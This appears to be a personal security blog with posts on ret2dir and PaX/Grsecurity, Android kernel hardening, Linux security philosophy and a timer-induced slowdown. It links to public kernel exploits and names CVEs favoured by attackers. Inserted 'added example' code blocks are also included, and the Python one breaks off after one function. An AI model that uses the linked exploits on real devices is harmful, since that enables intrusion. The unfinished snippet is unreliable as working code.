Hackology of CityPassword<br />
Just keep your mind open and suck in the experience. And if it hurts, it's probably worth it. God is Love!<br /><br />
Notes about ret2dir & PaX/Grsecurity (2016-09-15)<br /><br />
A paper "<a href="http://www.cs.columbia.edu/~vpk/papers/ret2dir.sec14.pdf" target="_blank">ret2dir: Rethinking Kernel Isolation</a>" was released two years ago. It claimed that ret2dir can bypass <a href="https://github.com/hardenedlinux/grsecurity-101-tutorials/blob/master/kernel_mitigation.md#ret2usr-protection" target="_blank">modern mitigations including KERNEXEC/UDEREF/SMEP/SMAP/PXN</a>. The authors proposed a defensive solution called eXclusive Page Frame Ownership (XPFO) in the paper, but it was not merged into the vanilla kernel back then. Some guys are trying to <a href="http://www.mail-archive.com/linux-kernel@vger.kernel.org/msg1231010.html" target="_blank">merge it</a> again lately.<br /><br />
ret2dir might be a dramatic exploit technique that can be useful for bypassing mitigations. But it's not that "perfect" when it comes to <a href="http://grsecurity.net/" target="_blank">PaX/Grsecurity</a>. KERNEXEC does much more than SMEP/PXN, which simply disallow executing userspace code in kernel mode. I'd like to share a few things( truth?):<br /><br />1, Even under kernel <= 3.9, a kernel patched with PaX/Grsecurity can prevent the ret2dir attack without enabling any features. ret2dir only works if a few highly situational conditions are satisfied. More detail? Plz ask those who did the tricks;-)<br /><br />2, The full ret2dir attack is based on PFN information. The paper reveals two approaches to get that information: <br /><br />1) simply read the info from /proc <br />2) physmap spraying <br /><br />Unfortunately, all exploits we've found( public exploits & ones unpacked from malware) in the past 18 months use the 1st approach. The evidence revealed that <a href="https://www.grsecurity.net/~spender/ekit/ret2dir/" target="_blank">all other ret2dir exploits are copycats of these two ret2dir exploit examples</a>( exploit writers don't work hard?):<br /><br />IMOHO, ROP is the only option left for the ret2dir attack. Then again, creating a ROP chain is not that easy on a PaX/Grsecurity kernel even without RAP, is it?<br /><br />
How can we "harden" an Android eco-system without Google? (2016-08-27)<br /><br />
.cn uses a shitty firewall that blocks every Google service, including Google Play and Nexus OTA. Android phone vendors provide their own OTA inside .cn. From the security aspect, there are a few issues that are hard to solve.<br />
<br />
1) Qualcomm/Samsung/Huawei build their own BSP based on AOSP source code. If the BSP ships without basic security mitigations, the cellphone vendors are unlikely to backport them. It will definitely be a problem for those who are concerned about security and privacy.<br />
<br />
2) Local small vendors upgrade so slowly, and some may not even have OTA. Security patches are hard to deliver in time.<br />
<br />
3) .cn doesn't have Google Play, which means tons of Android apps have never been well tested by a malware check before they go online for the end-user.<br />
<br />
Anyway, end-users have been suffering from the philosophy of "A bug is a bug". I'm going to share two stories about hardening solutions. The 1st one is how I got here with the help of PaX/Grsecurity's previous work. The 2nd is from Baidu( I don't talk about reputation here, not today-_-). Millions of Android phones are endangered by wild malware containing kernel exploits, such as <a href="http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/" target="_blank">HummingBad</a>, <a href="http://blog.trendmicro.com/trendlabs-security-intelligence/godless-mobile-malware-uses-multiple-exploits-root-devices/" target="_blank">Godless</a> and <a href="http://blogs.360.cn/360mobile/2016/06/21/analysis_of_diyuhuo/" target="_blank">Hellfire</a>( Chinese version).<br />
<br />
I'm pretty sure this is only the tip of the iceberg. Organizations like underground criminals and intelligence agencies might be using these easy-to-implement exploits to compromise Android phones without basic mitigations. How can we still not have ret2usr protection in 2016? Okidoki, welcome to the desert of the real;-)<br />
<br />
I've been keeping my eyes on which vulnerabilities and exploits exist within malware or rooting tools in the past 18 months. Then I figured out that some vulnerabilities are very popular on the offensive side: CVE-2014-3153( futex vuln), CVE-2015-3636( PingPong root), CVE-2015-0569( Prima wifi driver) and <a href="https://github.com/dosomder/iovyroot" target="_blank">CVE-2015-1805( iovyroot)</a>.<br />
<br />
I was thinking: what if there's a solution to prevent those exploits without patching anything? Then I tried to make a <a href="https://github.com/hardenedlinux/armv7-nexus7-grsec" target="_blank">prototype old Nexus device with a hardened kernel</a>. I did a few things on the Nexus 7 2013's kernel( repo based on Jan 2014) last year:<br />
<br />
1, Ported PaX to flo's kernel, which is based on 3.4. Note: What I used is a relatively weak version of PaX, without KERNEXEC/UDEREF/RAP and those strong Grsecurity features for x86.<br />
<br />
2, Ported PXN( armv7). Minimal memory mapping restriction might be the 1st step for ret2usr protection and PXN should be the 2nd one.<br />
<br />
3, Backported a security fix for CVE-2014-3153, which is the only vulnerability that needed to be fixed in my kernel, because this version doesn't have UDEREF/PAN. Fortunately, Kees Cook has done a backport of software-based PAN for 4.1.<br />
<br />
4, <a href="https://android.googlesource.com/kernel/common/+/19dc2c8b1ccfe130a8d2fc4093acacdf2ed1395f%5E!/" target="_blank">Prevented infoleaks</a> to make exploit writers' lives a bit harder.<br />
<br />
I've been using rooting tools like TOWELROOT/KINGROOT/360ROOT to test this hardened version. None of their exploits could work until last month( maybe). I've also modified some public exploits that need hardcoded values to test, and got the same result. Well, I guess it seems not bad( yet).<br />
<br />
Baidu( Google's competitor in .cn) <a href="http://conference.hitb.org/hitbsecconf2016ams/wp-content/uploads/2015/11/D1T2-Tim-Xia-Adaptive-Android-Kernel-Live-Patching.pdf" target="_blank">proposed a solution</a> a couple of months ago at HITB AMS and then released more info <a href="http://www.droidsec.cn/%E5%9F%BA%E4%BA%8E%E8%87%AA%E9%80%82%E5%BA%94%E7%83%AD%E8%A1%A5%E4%B8%81%E7%9A%84android%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%E7%94%9F%E6%80%81%E4%BF%AE%E5%A4%8D%E6%96%B9%E6%A1%88/" target="_blank">in Chinese here</a> and an <a href="https://www.blackhat.com/docs/us-16/materials/us-16-Zhang-Adaptive-Kernel-Live-Patching-An-Open-Collaborative-Effort-To-Ameliorate-Android-N-Day-Root-Exploits-wp.pdf" target="_blank">English version</a> at Black Hat USA.<br />
<br />
Unfortunately, they don't share how they get root( so obviously;-)) in the 1st place. The complete steps should look like this( let me know if I'm wrong):<br />
<br />
1) End-users install their app<br />
<br />
2) Root it via those easy-to-implement exploits( or get it by reversing-_-)<br />
<br />
3) Insert a rootkit( based on an inline hook framework) & Luapatch( policy engine) into the kernel. I'm very curious whether the Baidu guys cooperate with Huawei, 'cause Luapatch looks similar to <a href="https://github.com/ktap/ktap" target="_blank">Huawei's ktap</a>.<br />
<br />
4) Then fix the bug...let me guess, if you have a rootkit in someone else's kernel...well, shit will happen, as always. Besides, the policy engine & rootkit themselves may also have vulnerabilities. It's possible that adversaries( criminals/intelligence) will act if this solution becomes popular.<br />
<br />
<br />
IMOHO, I prefer the 1st way to solve the problem. But it's hard to convince vendors to merge the hardening patches. The 2nd solution may have potential risks to privacy; no one wants to have someone else's "god mode" in their cellphone, do they?<br />
<br />
I've been analyzing different situational hardening solutions and exploit methods. From the defensive aspect, I hope that <a href="https://github.com/hardenedlinux/grsecurity-101-tutorials/blob/master/kernel_mitigation.md" target="_blank">more mitigations</a> land in the AOSP kernel. Otherwise, KSPP is another way to improve Android security. Mitigation is the way to solve those issues once and for all.<br />
<br />
Update( Oct 31 2016): The <a href="https://github.com/hardenedlinux/armv7-nexus7-grsec" target="_blank">hardened PoC for Android</a> needed a backported fix for CVE-2016-5195( a.k.a "<a href="https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs" target="_blank">DirtyCOW</a>"), 'cause it's a dangerous threat to all Android devices. There are a dozen public PoCs, so it'd be much easier for attackers to forge weaponized exploits targeting Android devices.<br /><br />
Is Linux kernel secure? (2015-11-06)<br /><br />
I've read an article "<a href="http://www.washingtonpost.com/sf/business/2015/11/05/net-of-insecurity-the-kernel-of-the-argument/" target="_blank">Net of insecurity: The kernel of the argument</a>" from The Washington Post today. It's a fuc*ing good one. I've been tortured by the security status of the *stable* Linux kernel for a fuc*ing long time. I've never seen an article that talks about the truth like this one. Many commercial customers( especially from financial data centres) have been in pain using commercial GNU/Linux products for years. Remember those 0ld good null-deref exploits and the <a href="http://grsecurity.net/~spender/exploits/enlightenment.tgz" target="_blank">Enlightenment framework</a> back in the 2000s? What did Linus and these commercial GNU/Linux vendors respond back then? They said "A bug is a bug" is one thing, while SELinux can protect your assets is another. Unfortunately, they are lying to you, as always.......<br />
<br />
I'm not going to talk about that shitty history right here. You can google it if you really want to know the truth. A little advice: you could start from <a href="https://slo-tech.com/clanki/10001en" target="_blank">here</a>.<br />
<br />
Well, speaking of the history of mitigation, I highly recommend you go through thinkst's presentation at BH'10. Who the hell can explain the history in as much detail as he did;-)<br />
<br />
<a href="https://media.blackhat.com/bh-us-10/whitepapers/Meer/BlackHat-USA-2010-Meer-History-of-Memory-Corruption-Attacks-wp.pdf" target="_blank">Black Hat USA 2010: Memory Corruption Attacks: The Almost Complete History</a><br />
<br />
http://thinkst.com/resources/slides/bh-2010-haroon-meer-keynote.pdf<br />
<br />
1/5: https://www.youtube.com/watch?v=stVz9rhTdQ8<br />
2/5: https://www.youtube.com/watch?v=HJwg5vdoWCY<br />
3/5: https://www.youtube.com/watch?v=5vDRCi6OQuw<br />
4/5: https://www.youtube.com/watch?v=9edv8FwmJzk<br />
5/5: https://www.youtube.com/watch?v=4XEe5I4Wsrc<br />
<br />
<br />
"As long as there is technology, there will be hackers. As long as there are hackers, there will be PHRACK magazine."( Quoted from Phrack Issue 63). As long as there are vulnerabilities, there will be exploits. As long as there are exploits, there will be mitigation.........<br />
<br />
Basically, the possible evolution of an exploitable bug should look like this:<br />
--------------------------------------- <br />
Bug –> exploitable bug(vulnerability) –> poc –> exploit –> reliable/weaponized exploit<br />
---------------------------------------<br />
<br />
That's where the problem comes from. There are two types of philosophical ideas about how to deal with exploitable bugs.<br />
<br />
1, Linus Torvalds represents the philosophy of "A bug is a bug", which believes any exploitable bug should be taken care of like a normal bug. When one is found, just fix it. Any security mitigation is a complete waste of CPU. Developers should only focus on features and performance. He( and his followers) even believe that obscurity of bug info is the way to stop attackers and that "security through obscurity" is an effective approach for the Linux kernel upstream.<br />
<br />
2, <a href="http://pax.grsecurity.net/" target="_blank">PaX Team</a> and <a href="http://grsecurity.net/" target="_blank">spender</a> are the most fascinating guys on the side of security mitigation. They( I) believe the numerous exploitable bugs can not be solved once and for all by fixing them. But we can design specific security mitigations against specific types of vulnerabilities. That's the only way to solve this issue.<br />
<br />
Well, those two philosophical ideas are totally different. Why the hell does that happen? IMOHO, one of the main reasons is that the threat model is totally different. In my own adversary model, the attackers may have weaponized exploits developed by a digital armory( Vupen, HT?) or the underground. While only skiddies are in Linus's threat model( it seems to be, at least;-)).<br />
<br />
Some commercial GNU/Linux vendors basically believe a public exploit is the most important factor influencing their risk assessment. Don't believe that? <a href="https://securityblog.redhat.com/2015/04/08/dont-judge-the-risk-by-the-logo/" target="_blank">They admitted it themselves</a>;-)<br />
<br />
A lot of my customers always say one of the reasons they chose GNU/Linux as their alternative to UNIX is because GNU/Linux is secure. I've been wondering all the time and responding like "ARE U fuc*ing serious?". Now GNU/Linux is diving into the next age of the Internet, which some people would like to call IoT( Internet of Things). But the question is: Is the Linux kernel ready to face tons of cybercriminals? You fuc*ing tell me........<br />
<br />
btw: Kernel/Compiler/Firmware are very important core infrastructures of the modern cyber world. A lot of good people are busy defending our world with their effort. <a href="http://grsecurity.net/" target="_blank">PaX/Grsecurity</a> guys are my heroes. <a href="https://wiki.debian.org/ReproducibleBuilds" target="_blank">Reproducible builds</a>( based on the theory of <a href="http://www.dwheeler.com/trusting-trust/dissertation/html/wheeler-trusting-trust-ddc.html" target="_blank">DDC, by David A. Wheeler</a>) is definitely gonna piss the NSA off. <a href="http://chipsec/" target="_blank">CHIPSEC</a>( for firmware) may be the starting point. I do believe only a fine FOSS solution can make this world a little more secure......<br /><br />
Damn, the disclosure of PRISM cost my money;-) (2015-07-12)<br /><br />
Time is running on. It's been about two years since Mr. Sn0wden made the 1st disclosure of those documents back in June 2013. Everybody was shocked back then. In the security/hacker community, the news about what BIG BROTHER did to us was nothing new. Guess most people already knew it. But what Mr. Sn0wden brings us is confirmation of the details about how BIG BROTHER has been doing the shit. More importantly, it has educational value for the public. The whole world fuc*ing changed because of the PRISM disclosure. People( I mean crypto-anarchists, professional paranoids, etc) have thought differently since then. For myself( as a FOSS cybersecurity dude), PRISM definitely changed my life.<br />
<br />
I kept reading astonishing news about the leaked documents back in July 2013 and thought a lot during oSC2013 in a beautiful city near the Aegean Sea. "What should I do about it? Should I get involved with something? What kind of philosophical ideas can better fit the post-PRISM era?" and so on..I asked myself these questions many times. Then I was thinking...... <br />
<br />
1, Philosophical level. Well, the free software philosophy has been the same to me since 2007. The concept of free/libre is more important than ever before. In the post-PRISM era, BIG BROTHER and big corps are too powerful and restrict individual freedom in the digital world. Although we've won the war of open vs. closed, many people still misunderstand the <a href="http://www.gnu.org/philosophy/free-software-for-freedom.en.html" target="_blank">differences between free software and open source</a>. IMOHO, supporting the FSF( Free Software Foundation) will always be on my TODO.<br />
<br />
2, Technical level. Much research reveals that an open system is more secure than a closed one. Btw, <a href="http://citypw.blogspot.com/2013/12/life-was-never-easyespecially-in-post.html" target="_blank">Bruce Schneier agrees with that</a>. After all these years, I've finally realized there are two powerful weapons we can use against the enemy: system security & cryptography. Some people only focus on crypto while OS-level security is totally missing, which might cause a failure. It's like building a fortress upon sand. Some 0ld sch00l hackers criticised this last year. In practical cases for GNU/Linux users, PaX/Grsecurity is the only option we have.<br />
<br />
3, Law level. Speaking of law & public education, the EFF has been doing great work in the past two decades. Why would I support the EFF? The reason is so simple: they speak for me, or they speak for the type of person like me.<br />
<br />
I did the math a little bit today and found out I've donated around $5800 to the FOSS community, including <a href="http://www.fsf.org/" target="_blank">FSF</a>, <a href="https://www.eff.org/" target="_blank">EFF</a>, <a href="https://www.debian.org/" target="_blank">Debian</a>, <a href="https://wiki.debian.org/Mempo" target="_blank">Mempo</a>, <a href="https://grsecurity.net/" target="_blank">PaX/Grsecurity</a>, <a href="http://hardenedlinux.org/" target="_blank">HardenedLinux</a> and <a href="http://hardenedbsd.org/" target="_blank">HardenedBSD</a>, since the disclosure of PRISM. I'm not trying to convince anyone to donate money to any organization here. But I'm encouraging you to think for yourself: why are you here reading my fuc*ing annoying & noisy blog? Does free software matter to you? Or don't you think what the EFF is doing is worth supporting?<br />
<br />
Long live 0ld sch00l!<br />
Long live anarchy!<br /><br />
Debian GNU/Linux security checklist and hardening (2015-04-09)<br /><br />
The 1st time I met Debian GNU/Linux was about a decade ago when I was a college dude. Stupid college life was too boring back then;-) It was almost the same time I met the Phrack ezine for the 1st time. Damn, time is running on...<br />
<br />
Anyway, I'd like to share this article "<a href="https://raw.githubusercontent.com/citypw/DNFWAH/master/5/d5_0x02_DNFWAH_debian_gnu-linux_security_chklist_hardening.txt" target="_blank">Debian GNU/Linux security checklist and hardening</a>" with you guys. H0pe you can find your peace in this pathetic era;-) Yeah..yeah..I just wanna say: "Phrack is not dead, PaX/Grsecurity is not dead, DNFWAH is not dead, 0ld sch00l is not dead, the Underground spirit is not dead.....If they were, that'd be on us!!!".<br /><br />
HIGHRES TIMER can be your DoS nightmare (2015-03-17)<br /><br />
<pre>This is a real-life story about <span style="color: lime;">HIGH RESOLUTION TIMER</span> and how lame
coders use it to make a self-DoS;-) You should be very cautious if
your system was written by that type of coder.
Incident happened:
1, A dozen RHEL 6 GNU/Linux servers were extremely slow while
running some *** applications. The kernel CPU usage was about
40%--50%.
2, The "free" column from vmstat didn't seem OK. "free" kept
increasing but "buff" & "cache" were decreasing when a bunch of data
went through. Then the kernel gave you a *hint* about OOM( Out of Memory):
"kernel panic - not syncing: Out of memory and no killable processes..."
Then the kernel tried to kill each process until shit happened, which
was a kernel panic.
I began this investigation with strace. The result was quite
strange. Why would the application( malware?) invoke the syscall
nanosleep() so often? Every <span style="color: red;">10000ns</span>( 10us)? Seriously? All I can tell
is the application doesn't need to do real-time work.
--------------------------------------------------------------
<span style="color: red;">15:30:08.002047 nanosleep({0, 10000}, NULL) = 0 &lt;0.000082&gt;
15:30:08.002175 nanosleep({0, 10000}, NULL) = 0 &lt;0.000074&gt;
15:30:08.002297 nanosleep({0, 10000}, NULL) = 0 &lt;0.000074&gt;
...
15:30:09.917557 nanosleep({0, 10000}, NULL) = 0 &lt;0.000075&gt;
15:30:09.917661 nanosleep({0, 10000}, NULL) = 0 &lt;0.000071&gt;</span>
--------------------------------------------------------------
The customer said it never happened in 0ld good GNU/Linux systems(
like RHEL 5). My gut pointed me in a direction: High Resolution
Timer, a type of kernel timer that provides more accurate time
measurement. I've read the <a href="http://man7.org/linux/man-pages/man7/time.7.html" target="_blank">Linux manual</a> and the very well explained <a href="https://www.kernel.org/doc/Documentation/timers/hrtimers.txt" target="_blank">kernel doc</a> and
learned that HIGHRES TIMER was added to the upstream code in
2.6.21. So I guess..just guess..some lazy & lame coder just wanted to
make the program "sleep" for a very "short" time. Then he/she wrote
this code very confidently:
usleep(10);
If you're running a Linux kernel before 2.6.21, this line of code will
only sleep between 1ms and 2ms. But..an annoying *but* is coming..if
you're running a *modern* GNU/Linux distro with HIGHRES support, the
same code will sleep 10us, which might cause a performance hit. The CentOS
community had a <a href="http://unix.stackexchange.com/questions/37391/high-cpu-usage-with-cfs" target="_blank">similar issue</a> before.
From the evidence we have, there are two clues that might lead us to the
crime scene: High Resolution Timer.
1, nanosleep() has been invoked >=8k times every fuc*ing second.
2, The victim kernel was not running with kdump. But we still have
some kernel logs. According to the call trace, the kernel was playing
with HIGHRES-related context, which should not be a coincidence:
[&lt;ffffffff810d182e&gt;] ? audit_syscall_exit+0x27e/0x290
[&lt;ffffffff8100b2a4&gt;] ? sysret_audit+0x16/0x20
[&lt;ffffffff81092ff3&gt;] ? __hrtimer_start_range_ns+0x1a3/0x460
[&lt;ffffffff8100b2a4&gt;] ? sysret_audit+0x16/0x20
[&lt;ffffffff8100b2a4&gt;] ? sysret_audit+0x16/0x20
[&lt;ffffffff810cea0d&gt;] ? audit_filter_rules+0x2d/0xa10
[&lt;ffffffff810d182e&gt;] ? audit_syscall_exit+0x27e/0x290
[&lt;ffffffff8100b2a4&gt;] ? sysret_audit+0x16/0x20
schedule_timeout: wrong timeout value ffffffffffffb572
Solution:
I'm giving you two options:
1, Modify the source code( if you have it) of the *sleep*-related
functions and tell the fuc*ing coders they can go home and fuck
themselves.
2, Append "<span style="color: #3d85c6;">nohz=off highres=off</span>" to the kernel command line in
/etc/grub.conf to turn this fuc*ing feature off.
Testing result:
Unfortunately, we had to test this in a production system..but we did
it.
+-----------------------------------------------+
| Item | HIGHRES ON | HIGHRES OFF |
+-----------------------------------------------+
| nanosleep | >8,000 times | 345 times |
+-----------------------------------------------+
| buff/cache| Decreasing | Increasing |
+-----------------------------------------------+
| %sys | 50% | 6% |
+-----------------------------------------------+
Well, I guess we arrested the *perpetrator* this time. Damn...not every
business impact is caused by security issues;-)</pre>
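An added example( my own code, not from the post): it measures what a 10us nanosleep() really costs on the running kernel, and scans strace -tt output for the kind of nanosleep() storm described above. The sample log lines, the 1ms request ceiling and the 1000 calls/s threshold are constructed assumptions.<br />

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* nanosleep(), clock_gettime() */
#endif
#include <stdio.h>
#include <string.h>
#include <time.h>

/* Constructed `strace -tt` excerpt modelled on the post's output (not real
 * data). The read() line shows that other syscalls are ignored. */
static const char SAMPLE_STRACE[] =
    "15:30:08.002047 nanosleep({0, 10000}, NULL) = 0 <0.000082>\n"
    "15:30:08.002100 read(3, \"\", 1) = 0 <0.000010>\n"
    "15:30:08.002175 nanosleep({0, 10000}, NULL) = 0 <0.000074>\n"
    "15:30:08.002297 nanosleep({0, 10000}, NULL) = 0 <0.000074>\n"
    "15:30:08.002421 nanosleep({0, 10000}, NULL) = 0 <0.000076>\n"
    "15:30:08.002546 nanosleep({0, 10000}, NULL) = 0 <0.000075>\n";

struct sleep_stats {
    long   calls;       /* nanosleep() lines seen */
    long   min_req_ns;  /* shortest interval requested, -1 if none */
    double span_s;      /* wall time between first and last call */
    double rate_per_s;  /* calls per second over that span */
};

/* Walk strace -tt output line by line and collect nanosleep() statistics.
 * Timestamps are HH:MM:SS.uuuuuu; the request is the {sec, nsec} pair. */
void scan_nanosleep(const char *log, struct sleep_stats *st)
{
    double first = 0.0, last = 0.0;
    memset(st, 0, sizeof *st);
    st->min_req_ns = -1;
    while (*log) {
        const char *nl = strchr(log, '\n');
        size_t full = nl ? (size_t)(nl - log) : strlen(log);
        size_t len = full < 255 ? full : 255;   /* clamp oversized lines */
        char line[256];
        memcpy(line, log, len);
        line[len] = '\0';
        log += full + (nl ? 1 : 0);
        int h, m; double s; long req_s, req_ns;
        if (sscanf(line, "%d:%d:%lf nanosleep({%ld, %ld}",
                   &h, &m, &s, &req_s, &req_ns) != 5)
            continue;                           /* not a nanosleep() line */
        double ts = h * 3600.0 + m * 60.0 + s;
        long total_ns = req_s * 1000000000L + req_ns;
        if (st->calls++ == 0)
            first = ts;
        last = ts;
        if (st->min_req_ns < 0 || total_ns < st->min_req_ns)
            st->min_req_ns = total_ns;
    }
    st->span_s = last - first;
    if (st->calls > 1 && st->span_s > 0.0)
        st->rate_per_s = (st->calls - 1) / st->span_s;
}

/* A "sleep storm": sub-millisecond requests arriving faster than min_rate/s.
 * Thresholds are my assumptions; the post saw >= 8k calls/s at 10us each. */
int is_sleep_storm(const struct sleep_stats *st, long max_req_ns, double min_rate)
{
    return st->calls > 1 && st->min_req_ns >= 0 &&
           st->min_req_ns < max_req_ns && st->rate_per_s >= min_rate;
}

struct sleep_stats sample_stats(void)
{
    struct sleep_stats st;
    scan_nanosleep(SAMPLE_STRACE, &st);
    return st;
}

static double now_us(void)
{
    struct timespec t;
    clock_gettime(CLOCK_MONOTONIC, &t);
    return t.tv_sec * 1e6 + t.tv_nsec / 1e3;
}

/* Average wall-clock microseconds actually spent per nanosleep(req_us), i.e.
 * what usleep(10) really costs here: close to 10us with HIGHRES, rounded up
 * to the next tick (1-2ms at HZ=1000) on a jiffies-only kernel. */
double measure_sleep_us(long req_us, int iters)
{
    struct timespec req = { req_us / 1000000, (req_us % 1000000) * 1000 };
    double t0 = now_us();
    for (int i = 0; i < iters; i++)
        nanosleep(&req, NULL);
    return (now_us() - t0) / iters;
}

int main(void)
{
    struct sleep_stats st = sample_stats();
    printf("nanosleep calls=%ld min_req=%ldns rate=%.0f/s storm=%d\n",
           st.calls, st.min_req_ns, st.rate_per_s,
           is_sleep_storm(&st, 1000000L, 1000.0));
    printf("usleep(10) really costs %.1fus on this kernel\n",
           measure_sleep_us(10, 200));
    return 0;
}
```

Run it once with HIGHRES on and once with "nohz=off highres=off" to see the measured cost change from tens of microseconds to milliseconds.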
Happy New Year 2015 (2015-01-03)<br /><br />
Time is running on and brings us to another new year. Does this fuc*ing mean another fight? I've been sitting on my butt watching a lot of presentations from 31C3. Unfortunately, I couldn't be there physically. I'm fuc*ing jealous of you guys who were there;-)<br />
<br />
I've learned a lot from these videos, so I'd like to write down what I thought about some great topics.<br />
<br />
<span style="color: #3d85c6;"><span style="font-size: large;">31C3 Opening Event [31c3] mit Erdgeist und Geraldine de Bastion</span> </span><br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/qBsK3mzPdNM?feature=player_embedded' frameborder='0'></iframe></div>
Nothing I can say about the opening;-)<br />
<br />
<br />
<span style="font-size: large;"><span style="color: #3d85c6;">Jacob Appelbaum: Reconstructing narratives - transparency in the service of justice</span></span><br />
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/0SgGMj3Mf88?feature=player_embedded' frameborder='0'></iframe><br />
This is the most fuc*ing awesome presentation I've seen in 2014, since I watched Jacob's free speech at the last C3 conference. Yes..what I've been trying to tell people( friends & customers) is that there are only a few things we may rely on: OTR, PGP, SSL/TLS with PFS... This is a very positive message: not everything is being fucked. Well... IMOHO, only taking crypto itself into account is not enough. Kernel hardening should be a must-have more than ever before. A lot of 0ld sch00l guys are complaining that people still aren't taking system-level security seriously( <a href="https://grsecurity.net/" target="_blank">PaX/Grsecurity</a>? <a href="https://qubes-os.org/" target="_blank">Qubes OS</a>? <a href="http://www.openmirage.org/" target="_blank">Mirage OS</a>?) after EFF released their security guideline. Even the <a href="http://www.tcij.org/resources/handbooks/infosec" target="_blank">Information Security for Journalists</a> handbook focuses on crypto for the most part......damn...I think there is a lot of interesting stuff we could try in 2015.............<br />
<br />
<span style="color: #3d85c6;"><span style="font-size: large;">SS7map : mapping vulnerability of the international mobile roaming infrastructure [31c3] </span></span><br />
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/SfPC9IHCW-U?feature=player_embedded' frameborder='0'></iframe><br />
Well done, P1Sec guys! Telco security is not my major focus, but I've been learning CORENET stuff from some friends over the last few years. According to the <a href="http://ss7map.p1sec.com/" target="_blank">ss7map</a>, China is one of the countries with a high risk in CORENET. Guess a huge consulting market is out there;-)<br />
<br />
<br />
<span style="color: #3d85c6;"><span style="font-size: large;">The Cloud Conspiracy 2008-2014 [31c3] </span></span><br />
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/ijr0E6Lw4Nk?feature=player_embedded' frameborder='0'></iframe><br />Everybody is talking about the cloud. The cloud might help small startups( which don't have sensitive data) in many aspects, especially on cost. But..speaking of cloud security, damn..I'm gonna say it out loud: the security of the public cloud is a joke, and the security of the private cloud is a fraud;-)<br /><br /><span style="color: #3d85c6;"><span style="font-size: large;">Trustworthy secure modular operating system engineering</span></span><br />
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/4X0WjSqiIPs?feature=player_embedded' frameborder='0'></iframe><br />Building trust chains within compartments/containment is not a bad idea for defense in depth. "What you're doing is wrong" is a common phrase in the hacker community. But how to do it right is a scientific problem;-) I don't think a type-safe language will be a silver bullet. New issues and snake-oil security products always come out. People will be happy to talk about how "Next-Gen" technology is gonna change the future...unfortunately, they have no idea what the fuc* they're talking about( in most cases). Why would the fuc*ing industry need "Next-Gen" technology? I guess no one wants to talk about what the hell the Last-Gen tech was;-)<br />
<br />
<span style="color: #3d85c6;"><span style="font-size: large;">SS7: Locate. Track. Manipulate. </span></span><br />
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/lQ0I5tl0YLY?feature=player_embedded' frameborder='0'></iframe><br />
Wow..very good work, Tobias! I was so excited when you showed the demo. CORENET is really interesting and amazing. That reminds me of a saying from Captain: "The phone company is nothing but a computer... A computer is a System...". Ohh, did I say "cloud"?<br />
<br />
<br /> <br />
<span style="color: #3d85c6;"><span style="font-size: large;">Switches Get Stitches - Industrial System Ownership [31c3]</span></span><br />
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/CWZjQ4BTD0k?feature=player_embedded' frameborder='0'></iframe><br />
<br />
<br />
People have been taking ICS security seriously since the disclosure of Stuxnet. In the meantime, snake-oil products/services just come out of nowhere. This talk is awesome. It's almost like ICS security 101 to me. Thanks Eireann, I think I owe you a beer;-)<br />
<br /><span style="font-size: large;"><span style="color: #3d85c6;">Reproducible Builds - Moving Beyond Single Points of Failure for Software Distribution</span></span><br /><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/5pAen7beYNc?feature=player_embedded' frameborder='0'></iframe><br />
I love EFF and am proud to be a member. EFF has been doing a great job on public education and fighting for individuals' privacy. I'm not sure if we can win or not. But this is the right thing to do. Revealing the dark side of cybersecurity is inevitable. We have to deal with shit like what Mr. Dullien mentioned in <a href="http://www.isaca.org/chapters2/Norway/NordicConference/Documents/14.pdf" target="_blank">Offensive work and addiction</a>. Did we ever have a chance to live in a *pure* world without "<a href="https://firstlook.org/theintercept/document/2014/03/20/hunt-sys-admins/" target="_blank">I hunt sysadmin</a>"? If we don't, <a href="https://wiki.debian.org/ReproducibleBuilds" target="_blank">reproducible builds</a> are very valuable for us in the fight against mass surveillance. <a href="https://gitian.org/" target="_blank">Gitian</a> is a project that Seth & Mike mentioned.<br />
<br />
Reproducible builds can't solve all potential threats. But they can help us, to some extent, to answer "is there a backdoor in this supposedly identical binary, or isn't there?". You might also want to read about the <a href="http://lwn.net/Articles/555902/" target="_blank">Trusting trust issue</a>.<br />
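To make that concrete, here is an added example of mine (not code from the talk, from Gitian or from the Debian project) showing where non-reproducibility comes from and how a normalizing packing step removes it: two tarballs are packed from byte-identical files "compiled" one minute apart. The default packing bakes in file timestamps, ownership and the gzip header time, so the two hashes differ even though the contents are identical; the normalized packing yields the same hash both times, which is what lets two independent builders compare their output. The source tree and its contents are constructed inline.

```python
import gzip
import hashlib
import io
import os
import tarfile
import tempfile


def normalize(tarinfo: tarfile.TarInfo) -> tarfile.TarInfo:
    """Strip build-environment noise from a tar header: timestamps, owner
    and umask-dependent permission bits all vary from builder to builder."""
    tarinfo.mtime = 0
    tarinfo.uid = tarinfo.gid = 0
    tarinfo.uname = tarinfo.gname = ""
    tarinfo.mode = 0o755 if (tarinfo.isdir() or tarinfo.mode & 0o100) else 0o644
    return tarinfo


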